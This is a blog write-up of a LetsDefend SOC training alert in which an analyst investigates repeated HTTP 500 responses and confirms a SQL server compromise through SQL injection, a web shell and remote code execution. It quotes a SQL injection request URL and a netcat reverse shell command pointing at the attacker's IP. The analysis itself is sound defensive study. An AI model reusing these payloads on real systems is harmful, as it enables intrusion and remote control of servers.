LetsDefend.io SOC-142 Multiple HTTP 500 Response

HTTP response is how the web-server tells you what is going on. If you get a 200 status code, that means everything went well. 301? You’re being redirected.

But 500? It usually means there is an error by the back-end server. But multiple 500 responses? That’s something worth looking at.

In this case, we’ll take a look at a case where there was multiple 500 response made on a server.

Case Details

  • Event Time: April 18, 2021, 1 p.m.
  • EventID : 89
  • Rule: SOC142 — Multiple HTTP 500 Response
  • Level: Security Analyst
  • Source Address 101.32.223.119
  • Source Hostname 101.32.223.119
  • Destination Address 172.16.20.6
  • Destination Hostname SQLServer
  • Username www-data
  • Request URL https://172.16.20.6/userNumber=1 AND (SELECT * FROM Users) = 1
  • User Agent Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
  • Device Action Allowed

Analysis

  • Source address is : 101.32.223.119
  • Destination Address is : 172.16.20.6
  • Looking at the destination address in Endpoint Management, the target was our SQL server.
  • Let’s see if the IP was flagged as malicious on VirusTotal.
Big yikes
  • The IP was flagged as malicious by 5 vendors. So anything flagged as malicious by some security vendors, we should take some precaution with it.

Logs

  • We can search for the source address and the destination address in the Logs Management.
mmmm i love logs.
  • We see a lot of entries and if we inspect one of them, it looks like they were trying for SQL injection at :
SQL injection
  • At entry 392, it seems that they managed to upload a web shell.
Uploading a webshell in php
  • And for the last entry, it seems they have managed to achieve remote code execution.
Oh no RCE.

Endpoint Management

  • Let’s search for the destination address.
  • It is indeed our SQL server. Let’s look at the command history.
  • If we look for the entries at time 13:01 until 13:05, these looks fishy.
  • If you don’t know, nc is the command for netcat. Netcat is a networking utility to establish TCP or UDP connections.
nc 101.32.223.119 1234 -e /bin/sh
  • So it’s connecting to the source address on port 1234 and -e /bin/sh where sh is a shell.
-e filename  specify filename to exec after connect (use with caution).
  • Now let’s see if they were any network connections made to that IP.
Uh oh they connected.
  • Looks like it indeed connected to the IP, so our SQL server was compromised.
  • Let’s look now at process to see if they started any weird process other than the netcat connection.
Deleting an antivirus signature?
  • I’m not sure what its deleting, but I know for sure clamav is free and open source anti-virus program usually used in Linux. Deleting it is a bit suspicious.

Final Verdict

  • From all the evidence we see and collected, we can confirm that an attacker leveraged a SQL injection vulnerability on the SQL server to compromise the server. The threat actor managed to use the vulnerability to upload a web shell where the actor was able to perform remote code execution on the server. This leads to the compromise of the server. This is a true positive.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
FarisArch

FarisArch

Student that loves FOSS and hacking